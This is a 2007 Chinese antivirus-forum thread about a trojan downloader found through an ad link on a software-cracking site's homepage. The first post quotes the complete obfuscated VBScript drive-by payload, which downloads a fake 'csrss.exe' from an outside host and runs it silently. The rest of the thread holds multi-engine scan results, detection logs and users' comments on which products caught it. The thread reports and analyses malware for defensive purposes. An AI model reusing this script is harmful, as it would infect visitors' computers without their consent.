从中国破解联盟主页找到的下载者一个

显示全部楼层 · 发表于 2007-4-7 00:48:07

http://www.cncrk.com/ >>> http://ad2.mayiad.com/code/ad010.asp?id=211 >>> http://ad2.mayiad.com/code/id_detai.htm >>>

on error resume next curl="http://ad2.mayiad.com/soft/csrss.exe" fname1="csrss.exe" fname2="csrss.vbs" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") C1="Ado" C2="db." C3="str" C4="eam" str1=C1&C2&C3&C4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, curl, False x.Send s1="Script" s2="ing." s3="File" s4="SystemObject" s0=s1+s2+s3+s4 set F = df.createobject(s0,"") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close fname2= F.BuildPath(tmp,fname2) Set ts = F.OpenTextFile(fname2, 2, True) ts.WriteLine "Set Shell = CreateObject(""Shell.Application"")" sql="Shell.ShellExecute """+fname1+""","""","""",""open"",0" ts.WriteLine sql ts.close if F.FileExists(fname1)=true then if F.FileExists(fname2)=true then set Q = df.createobject("Shell.Application","") Q.ShellExecute fname2,"","","open",0 end if end if

>>> http://ad2.mayiad.com/soft/csrss.exe

>>>

ArcaVir	1.0.4	Clean	2.73823 secs
avast!	3.0.0	Clean	0.015183 secs
AVG Anti Virus	7.5.45	Clean	2.27977 secs
BitDefender	7.1	Clean	3.92912 secs
CAT QuickHeal	9.00	Clean	4.47865 secs
ClamAV	0.90/3028	Clean	0.245847 secs
Dr. Web	4.33.0	Clean	8.09897 secs
F-PROT	4.6.7	Unknown	20.0971 secs
F-Secure	1.02	Clean	0.351564 secs
H+BEDV AntiVir	2.1.10-32	NULL	5.32925 secs
McAfee Virusscan	5.10.0	New Malware.aq	1.61741 secs
NOD32	2.51.1	Clean	7.94989 secs
Norman Virus Control	5.70.01	NULL	6.24114 secs
Panda	9.00.00	Clean	1.50192 secs
Sophos Sweep	4.16.0	Mal/Packer	4.00671 secs
Trend Micro	8.310-1002	Clean	0.0624151 secs
VBA32	3.11.3	Clean	6.62701 secs
VirusBuster	1.3.3	Packed/NSPack	2.11167 secs

显示全部楼层 · 发表于 2007-4-7 00:49:42

2007-4-7 0:49:05
已由访问保护规则禁止csrss\csrss.exe
防病毒标准保护:禁止伪装 Windows 进程
已阻止的操作: 创建

显示全部楼层 · 发表于 2007-4-7 00:50:32

秒杀

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\csrss.rar'
C:\Documents and Settings\morgan\My Documents\
  csrss.rar
[0] Archive type: RAR
--> csrss.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
      [WARNING] Infected files in archives cannot be repaired!
      [INFO]    The file was deleted!

显示全部楼层 · 发表于 2007-4-7 00:56:06

没有报
上报了
这个可不敢运行

显示全部楼层 · 发表于 2007-4-7 00:56:39

卡巴没有反应

显示全部楼层 · 发表于 2007-4-7 00:58:20

我的avast!怎么下载就报

，LZ扫描有问题吧

显示全部楼层 · 发表于 2007-4-7 01:01:45

下载者，运行后报高危险。

显示全部楼层 · 发表于 2007-4-7 01:02:12

原帖由 欠你幸福 于 2007-4-7 00:58 发表
我的avast!怎么下载就报，LZ扫描有问题吧

直接在多引擎扫描页面里面扫描的，可能它用的版本比较旧吧

显示全部楼层 · 发表于 2007-4-7 01:06:22

avast!还用3.0版本的引擎，过时5年了
其实才发现到avast!脱壳也真牛

显示全部楼层 · 发表于 2007-4-7 01:11:21

我现在玩的的是avast4.7.971

从中国破解联盟主页找到的下载者一个

本帖子中包含更多资源

mcafee，又不让进了，晕

本帖子中包含更多资源

本帖子中包含更多资源